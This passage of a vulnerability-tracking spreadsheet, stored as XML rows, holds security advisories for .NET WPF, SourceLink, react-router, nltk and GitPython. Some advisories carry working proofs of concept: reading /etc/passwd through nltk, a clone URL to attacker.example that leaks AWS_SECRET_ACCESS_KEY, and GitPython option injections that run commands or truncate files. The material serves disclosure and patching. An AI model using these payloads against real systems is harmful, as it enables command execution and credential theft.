3. Path canonicalization</t></is></c><c r="S90" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49114</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D91" s="5" t="inlineStr" /><c r="E91" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F91" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="n"><v>0.01</v></c><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr" /><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr"><is><t>nuget:Microsoft.WindowsDesktop.App.Runtime.win-arm64, nuget:Microsoft.WindowsDesktop.App.Runtime.win-x64, nuget:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M91" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N91" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O91" s="5" t="inlineStr" /><c r="P91" s="5" t="inlineStr" /><c r="Q91" s="5" t="inlineStr"><is><t>CWE-502, CWE-693</t></is></c><c r="R91" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Windows Presentation Foundation (WPF). This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

A remote code execution vulnerability exists in Windows Presentation Foundation (WPF) in .NET 8, .NET 9, and .NET 10 when parsing specially crafted XAML input. An attacker who successfully exploits this vulnerability could execute arbitrary code in the context of the current user.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** High
- **Score:** 7.8
- **Vector:** `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
- **Weakness:** CWE-693 (Protection Mechanism Failure)

## Affected Platforms

- **Platforms:** Windows
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name=".NET 10.0"&gt;&lt;/a&gt;.NET 10.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10

### &lt;a name=".NET 9.0"&gt;&lt;/a&gt;.NET 9.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18

### &lt;a name=".NET 8.0"&gt;&lt;/a&gt;.NET 8.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29

## Advisory FAQ

### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?

If using a package listed in [affected packages](#affected-packages), developers exposed to the vulnerability.

### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?

1. To fix the issue please install the latest version of .NET. If developers have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt them to update Visual Studio, which will also update their .NET SDKs.
2. If their application references the vulnerable nuget package, update the package reference to the patched version. Developers can list the versions they have installed by running the `dotnet --info` command.

Once developers have installed the updated runtime or SDK, they should restart their apps for the update to take effect.

Additionally, if they've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

## Other Information

### Reporting Security Issues

If anyone has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Direct questions about this issue to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[CVE-2026-50646]( https://www.cve.org/CVERecord?id=CVE-2026-50646)

### Acknowledgements

Kevin Gosse, 41ae55e9310ff27fa6f26af4727e5590, Ky0toFu

### Revisions

V1.0 (July 14, 2026): Advisory published.</t></is></c><c r="S91" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>CVE-2026-53668</t></is></c><c r="D92" s="5" t="inlineStr" /><c r="E92" s="5" t="inlineStr" /><c r="F92" s="5" t="inlineStr" /><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="n"><v>0.003</v></c><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr"><is><t>npm:react-router, npm:react-router-dom</t></is></c><c r="M92" s="5" t="inlineStr"><is><t>6.30.6, 7.13.0</t></is></c><c r="N92" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O92" s="5" t="inlineStr" /><c r="P92" s="5" t="inlineStr" /><c r="Q92" s="5" t="inlineStr"><is><t>CWE-79, CWE-601</t></is></c><c r="R92" s="5" t="inlineStr"><is><t>Applications with open redirects could permit attacker crafted links to result in redirects to unexpected external location or XSS vectors.</t></is></c><c r="S92" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53668</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D93" s="5" t="inlineStr" /><c r="E93" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="n"><v>0.005</v></c><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr" /><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr"><is><t>nuget:Microsoft.Build.Tasks.Git, nuget:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M93" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N93" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O93" s="5" t="inlineStr" /><c r="P93" s="5" t="inlineStr" /><c r="Q93" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="R93" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Microsoft.Build.Tasks.Git and Microsoft.SourceLink.AzureRepos.Git. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

Improper removal of sensitive information before storage or transfer in .NET allows an unauthorized attacker to disclose information over a network.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C`
- **Weakness:** CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer

## Affected Platforms

- **Platforms:** Windows, Linux, macOS
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name="published-nuget-packages"&gt;&lt;/a&gt;Published NuGet packages
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303

The affected packages used by .NET 8 and .NET 9 SDKs are built with SDK-specific prerelease versions that aren't published as stable NuGet packages. Update to SDK 8.0.130 or 8.0.424, SDK 9.0.120 or 9.0.317, or SDK 10.0.111 or 10.0.303 to receive the fix.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[CVE-2026-62900](https://www.cve.org/CVERecord?id=CVE-2026-62900)

### Acknowledgements

Ivan Demchuk

### Revisions

V1.0 (08/11/2026): Advisory published.</t></is></c><c r="S93" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D94" s="5" t="inlineStr" /><c r="E94" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F94" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="n"><v>0.004</v></c><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr" /><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M94" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N94" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O94" s="5" t="inlineStr" /><c r="P94" s="5" t="inlineStr" /><c r="Q94" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R94" s="5" t="inlineStr"><is><t>### Summary

There's a logic bug in `FileSystemPathPointer.open()` inside `nltk/data.py`
that makes the sandbox check permanently inert. The guard condition is always
`False` — meaning any file the process can read is accessible by passing a
`file://` URL to `nltk.data.load()`.

---

### Details

In `nltk/data.py`, `FileSystemPathPointer.open()` was patched at some point
with a comment saying "SECURITY PATCH ENFORCING SANDBOX", but the check
doesn't work:
```python
def open(self, encoding=None):
    path = os.path.normpath(self._path)

    # Block raw absolute reads such as "/" "C:\\Windows" etc.
    if os.path.isabs(path) and path != os.path.normpath(self._path):
        raise ValueError(f"Direct absolute file access blocked: {path}")

    stream = open(self._path, "rb")
```

`path` is set to `os.path.normpath(self._path)` on line 1, then compared
against `os.path.normpath(self._path)` again in the condition. They are
always equal. The `ValueError` never fires.

On top of that, `__init__` already calls `os.path.abspath()` before storing
`self._path`, so it's normalized before `open()` is even called. Running
`normpath` on it again changes nothing.

The `stream = open(self._path, "rb")` line is always reached regardless of
what path was passed in.

---

### PoC

Tested on Python 3.11, NLTK 3.9.1, Ubuntu 22.04.
```python
import nltk
from nltk.data import FileSystemPathPointer

# direct construction
ptr = FileSystemPathPointer("/etc/passwd")
with ptr.open() as f:
    print(f.read(300))

# via load() using file:// URL
data = nltk.data.load("file:///etc/passwd", format="raw")
print(data[:300])
```

Both print file contents. No exception is raised.

---

### Impact

Any app that lets users influence the string passed to `nltk.data.load()` or
`nltk.data.find()` is exposed — web APIs, notebook servers, multi-tenant
pipelines. An attacker can read any file the process user has access to:
`/etc/passwd`, `.env` files, private keys, `~/.aws/credentials`, etc.

## Suggested Fix

**File:** `nltk/data.py` — `FileSystemPathPointer.open()` (lines 378–390)

### What's wrong

Line 387 compares `normpath(self._path)` against itself — always equal,
so the `ValueError` never fires. The check is dead code.
`__init__` already calls `abspath()` on construction, so re-running
`normpath` inside `open()` changes nothing either.

---

### Fix

Validate against the actual list of permitted data directories instead:
```python
def open(self, encoding=None):
    import nltk.data as _d
    allowed = [os.path.abspath(p) for p in _d.path if p]
    if allowed and not any(
        os.path.commonpath([self._path, r]) == r for r in allowed
    ):
        raise ValueError(
            f"Access outside nltk_data blocked: {self._path!r}"
        )
    stream = open(self._path, "rb")
    if encoding is not None:
        stream = SeekableUnicodeStreamReader(stream, encoding)
    return stream
```

---

### Why `commonpath` not `startswith`

`startswith` is bypassable by a path that shares a prefix:
```
/tmp/nltk_data_evil".startswith("/tmp/nltk_data") → True  ✗
commonpath(["/tmp/nltk_data_evil", "/tmp/nltk_data"]) → "/tmp"  ✓
```

---

### Diff
```diff
-    path = os.path.normpath(self._path)
-    if os.path.isabs(path) and path != os.path.normpath(self._path):
-        raise ValueError(f"Direct absolute file access blocked: {path}")
-
+    import nltk.data as _d
+    allowed = [os.path.abspath(p) for p in _d.path if p]
+    if allowed and not any(
+        os.path.commonpath([self._path, r]) == r for r in allowed
+    ):
+        raise ValueError(f"Access outside nltk_data blocked: {self._path!r}")
     stream = open(self._path, "rb")
```</t></is></c><c r="S94" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>CVE-2026-67322</t></is></c><c r="D95" s="5" t="inlineStr" /><c r="E95" s="5" t="inlineStr" /><c r="F95" s="5" t="inlineStr" /><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="n"><v>0.003</v></c><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr" /><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M95" s="5" t="inlineStr"><is><t>3.1.52</t></is></c><c r="N95" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O95" s="5" t="inlineStr" /><c r="P95" s="5" t="inlineStr" /><c r="Q95" s="5" t="inlineStr"><is><t>CWE-200, CWE-201</t></is></c><c r="R95" s="5" t="inlineStr"><is><t>### Summary
`Repo.clone_from()` passes the caller-supplied remote URL through `Git.polish_url()`, which on every non-Cygwin platform calls `os.path.expandvars()` on the URL before handing it to `git clone`. An attacker who controls the URL argument — the documented use case for `clone_from()` in "import repository from URL" features of CI servers, git-hosting mirrors, and dependency scanners — can embed `$NAME` / `${NAME}` tokens that are expanded server-side to the values of the hosting process's environment variables. The resulting URL, now containing the secret, is transmitted over the network to the attacker-named host. This crosses the trust boundary between an untrusted remote URL and the server's process environment, disclosing secrets such as `AWS_SECRET_ACCESS_KEY` or `GITHUB_TOKEN` with no precondition beyond the ability to submit a clone URL.

### Details
**Affected versions:** `gitpython` (PyPI) — all releases up to and including `3.1.50` (latest at time of reporting); confirmed present on the `main` branch.

`Git.polish_url()` unconditionally applies environment-variable expansion to its input on the non-Cygwin branch:

`git/cmd.py` (v3.1.50), lines 907–925:
```python
@classmethod
def polish_url(cls, url: str, is_cygwin: Union[None, bool] = None) -&gt; PathLike:
    """Remove any backslashes from URLs to be written in config files.
    ...
    """
    if is_cygwin is None:
        is_cygwin = cls.is_cygwin()

    if is_cygwin:
        url = cygpath(url)
    else:
        url = os.path.expandvars(url)          # &lt;-- line 921
        if url.startswith("~"):
            url = os.path.expanduser(url)
        url = url.replace("\\\\", "\\").replace("\\", "/")
    return url
```

`Repo._clone()` — reached from the public `Repo.clone_from()` (`git/repo/base.py:1520`) and `Repo.clone()` — runs the unsafe-protocol check on the **raw** URL and then passes the **polished** (post-expansion) URL to the `git clone` subprocess:

`git/repo/base.py` (v3.1.50), lines 1407–1418:
```python
if not allow_unsafe_protocols:
    Git.check_unsafe_protocols(url)
if not allow_unsafe_options:
    Git.check_unsafe_options(options=list(kwargs.keys()), unsafe_options=cls.unsafe_git_clone_options)
if not allow_unsafe_options and multi:
    Git.check_unsafe_options(options=multi, unsafe_options=cls.unsafe_git_clone_options)

proc = git.clone(
    multi,
    "--",
    Git.polish_url(url),          # &lt;-- line 1417: expanded URL sent to `git clone`
    clone_path,
    ...
)
```

Because `os.path.expandvars()` on POSIX substitutes `$NAME` and `${NAME}` with `os.environ[NAME]` when set (and on Windows additionally `%NAME%`), an attacker-supplied URL such as:

```
https://attacker.example/steal/${AWS_SECRET_ACCESS_KEY}/repo.git
```

is rewritten server-side to embed the literal secret value in the path component, and `git clone` then issues an HTTP(S) request (and DNS lookup, if the token is placed in the host label) carrying that value to `attacker.example`. The clone itself will typically fail, but the secret has already left the server by that point.

`polish_url()` was written as a local-path normalisation helper (Cygwin path conversion, `~` expansion, backslash fixing) and is applied indiscriminately to remote URLs. There is no scheme check, no `expand_vars=False` opt-out for the clone URL, and no documentation that the URL undergoes environment expansion — the `clone_from` docstring describes `url` only as a "Valid git url". By contrast, the maintainers already flag env-var expansion as a security concern for the *local repository path* argument: `Repo.__init__` emits a deprecation warning ("The use of environment variables in paths is deprecated for security reasons", `git/repo/base.py:226–231`) and offers `expand_vars=False`. The same treatment is missing for the network-bound clone URL.

**Secondary consequence (unsafe-protocol filter bypass).** Because `check_unsafe_protocols()` runs on the *pre-expansion* URL (line 1408) but the *post-expansion* URL is what reaches `git`, an attacker who additionally controls any environment variable in the server process could set e.g. `X=ext::sh -c '...'` and submit `url="$X"`; the raw string `$X` passes the `ext::` filter, then expands to an `ext::` remote-helper transport that `git` will execute. This requires a second precondition (env-var write) and is noted as an aggravating factor rather than a separate vulnerability.

### PoC
Tested against `gitpython==3.1.50` on Linux with Python 3 and `git` on `PATH`.

```bash
python3 -m venv /tmp/gp-venv
/tmp/gp-venv/bin/pip install gitpython==3.1.50
/tmp/gp-venv/bin/python poc.py
```

`poc.py`:
```python
#!/usr/bin/env python3
"""
PoC: environment-variable exfiltration via Repo.clone_from() URL.

Demonstrates that an attacker-controlled `url` argument to Repo.clone_from()
is passed through os.path.expandvars() before being given to `git clone`,
so `$NAME` tokens in the URL are replaced with the server process's
environment-variable values and transmitted to the attacker-named host.

The PoC intercepts the Popen argv to show the exact URL handed to `git`
without performing real network I/O.
"""
import os
import sys
import subprocess
import tempfile

# Simulate a sensitive server-side environment variable.
os.environ["AWS_SECRET_ACCESS_KEY"] = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"

import git                              # noqa: E402
from git import Git, Repo               # noqa: E402

print(f"gitpython version: {git.__version__}")

# --- Layer 1: Git.polish_url() directly --------------------------------------
attacker_url = "https://attacker.example/steal/$AWS_SECRET_ACCESS_KEY/repo.git"
polished = Git.polish_url(attacker_url)
print("\n[Layer 1] polish_url result:")
print(f"  input : {attacker_url}")
print(f"  output: {polished}")
if os.environ["AWS_SECRET_ACCESS_KEY"] in polished:
    print("  -&gt; secret SUBSTITUTED into URL by polish_url()")

# --- Layer 2: full Repo.clone_from() -- capture argv given to `git` ----------
captured = {}
orig_popen = subprocess.Popen

class CapturingPopen(orig_popen):
    def __init__(self, cmd, *a, **kw):
        if isinstance(cmd, (list, tuple)) and "clone" in cmd:
            captured["cmd"] = list(cmd)
        super().__init__(cmd, *a, **kw)

subprocess.Popen = CapturingPopen
import git.cmd as gitcmd                # noqa: E402
gitcmd.safer_popen = CapturingPopen     # non-Windows: safer_popen == Popen

dest = tempfile.mkdtemp(prefix="gp_poc_")
try:
    Repo.clone_from(attacker_url, os.path.join(dest, "out"))
except Exception as e:
    # The clone fails (attacker.example does not resolve); we only need argv.
    print(f"\n[Layer 2] clone_from raised (expected): {type(e).__name__}")

subprocess.Popen = orig_popen

print("\n[Layer 2] argv passed to `git clone` subprocess:")
for tok in captured.get("cmd", []):
    print(f"  {tok}")

cmd = captured.get("cmd", [])
url_arg = cmd[cmd.index("--") + 1] if "--" in cmd else None
print(f"\n[Layer 2] URL argument given to git: {url_arg}")

secret = os.environ["AWS_SECRET_ACCESS_KEY"]
if url_arg and secret in url_arg:
    print(
        "\nVULNERABLE: server env var AWS_SECRET_ACCESS_KEY was interpolated "
        "into the remote clone URL; git would transmit it to attacker.example."
    )
    sys.exit(0)
print("\nNOT VULNERABLE")
sys.exit(1)
```

Expected output:
```
gitpython version: 3.1.50

[Layer 1] polish_url result:
  input : https://attacker.example/steal/$AWS_SECRET_ACCESS_KEY/repo.git
  output: https://attacker.example/steal/wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY/repo.git
  -&gt; secret SUBSTITUTED into URL by polish_url()

[Layer 2] clone_from raised (expected): GitCommandError

[Layer 2] argv passed to `git clone` subprocess:
  git
  clone
  -v
  --
  https://attacker.example/steal/wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY/repo.git
  /tmp/gp_poc_XXXXXXXX/out

[Layer 2] URL argument given to git: https://attacker.example/steal/wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY/repo.git

VULNERABLE: server env var AWS_SECRET_ACCESS_KEY was interpolated into the remote clone URL; git would transmit it to attacker.example.
```

The captured argv is the exact command line spawned by GitPython; against a real attacker-controlled host, `git` would issue a DNS lookup and HTTP(S) request to that host with the secret embedded in the request path.

### Impact
Any application that calls `Repo.clone_from()` (or `Repo.clone()`) with a URL that is wholly or partially attacker-controlled — the canonical pattern for "import/mirror repository from URL" features in CI systems, source-code hosting platforms, dependency scanners, and build pipelines — allows an unauthenticated or low-privileged attacker to exfiltrate arbitrary environment variables from the server process, one per request, by naming them in the URL. Cloud credentials, API tokens, and signing keys stored in the environment are the primary targets. Applications that do not accept clone URLs from untrusted sources, or that run the cloner in a process with a fully stripped environment, are not affected. There is no direct integrity or availability impact.

**Suggested fix:** Remove the `os.path.expandvars()` (and `os.path.expanduser()`) call from `Git.polish_url()` for inputs that are remote URLs (contain `://` or match `user@host:path`), or remove the expansion entirely and require callers who want local-path env expansion to perform it themselves — mirroring the existing deprecation on `Repo(path, expand_vars=…)`. Additionally, apply `check_unsafe_protocols()` to the *post-transformation* URL so no future `polish_url` change can silently bypass the `ext::` filter.</t></is></c><c r="S95" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67322</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>CVE-2026-67323</t></is></c><c r="D96" s="5" t="inlineStr" /><c r="E96" s="5" t="inlineStr" /><c r="F96" s="5" t="inlineStr" /><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="n"><v>0.01</v></c><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr" /><c r="K96" s="5" t="inlineStr" /><c r="L96" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M96" s="5" t="inlineStr"><is><t>3.1.51</t></is></c><c r="N96" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O96" s="5" t="inlineStr" /><c r="P96" s="5" t="inlineStr" /><c r="Q96" s="5" t="inlineStr"><is><t>CWE-77, CWE-88</t></is></c><c r="R96" s="5" t="inlineStr"><is><t>## Summary

GitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in
git/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this
check him he is only call from fetch, pull, push and clone_from, everything else who build a git
argv from caller values just go through, no check, three examples

## Code analysis

Repo.archive (git/repo/base.py:1623) do self.git.archive("--", treeish, *path, **kwargs), the
treeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and
they land before it, so {"remote": ".", "exec": "&lt;cmd&gt;"} give
git archive --remote=. --exec=&lt;cmd&gt; -- &lt;rev&gt;, the --remote spawn the upload-archive helper and
--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and
archive already document caller kwargs (format, prefix, path) so pass a dict is normal usage

repo.git.ls_remote(url, upload_pack="&lt;cmd&gt;"), same builder, same result, it's exactly the kwarg
gap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic
repo.git.&lt;anything&gt;(**user_dict) surface him he never got the fix

Repo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev
before the --, no leading-dash check, a "branch name" like --output=/etc/whatever become
git rev-list --output=... --, and git he open and truncate that file before he even validate the
revision, the file is gone even if the command error right after

## PoC

Released 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).

```
pip install GitPython   # 3.1.50
```

Common setup for the three:

```python
import io, os, tempfile, subprocess, git
d = tempfile.mkdtemp()
subprocess.run(['git','init','-q',d], check=True)
subprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',
                'commit','-q','--allow-empty','-m','init'], check=True)
repo = git.Repo(d)
tmp = tempfile.gettempdir()
```

1. exec via archive (a service exports a repo and forwards the user's options dict):

```python
m = os.path.join(tmp, 'gp_archive_check')
try: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})
except git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])
print('[+] marker present:', os.path.exists(m))
```
```
[*] Cmd('git') failed due to: exit code(128)
[+] marker present: True
```

2. exec via ls_remote:

```python
m = os.path.join(tmp, 'gp_lsremote_check')
try: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')
except git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])
print('[+] marker present:', os.path.exists(m))
```
```
[*] Cmd('git') failed due to: exit code(128)
[+] marker present: True
```

3. file clobber via a rev that looks like a ref:

```python
v = os.path.join(tmp, 'release_notes.txt')
open(v,'w').write('do not delete\n')
print('[*] before:', repr(open(v).read()))
try: list(repo.iter_commits('--output=' + v))
except git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])
print('[+] after :', repr(open(v).read()), '&lt;- truncated')
```
```
[*] before: 'do not delete\n'
[*] Cmd('git') failed due to: exit code(129)
[+] after : '' &lt;- truncated
```</t></is></c><c r="S96" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67323</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>CVE-2026-67325</t></is></c><c r="D97" s="5" t="inlineStr" /><c r="E97" s="5" t="inlineStr" /><c r="F97" s="5" t="inlineStr" /><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="n"><v>0.019</v></c><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr" /><c r="K97" s="5" t="inlineStr" /><c r="L97" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M97" s="5" t="inlineStr"><is><t>3.1.51</t></is></c><c r="N97" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O97" s="5" t="inlineStr" /><c r="P97" s="5" t="inlineStr" /><c r="Q97" s="5" t="inlineStr"><is><t>CWE-78, CWE-184</t></is></c><c r="R97" s="5" t="inlineStr"><is><t>## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)

**Component:** gitpython-developers/GitPython (PyPI: GitPython)
**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)
**Reporter:** hackkim

### Summary

The 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.

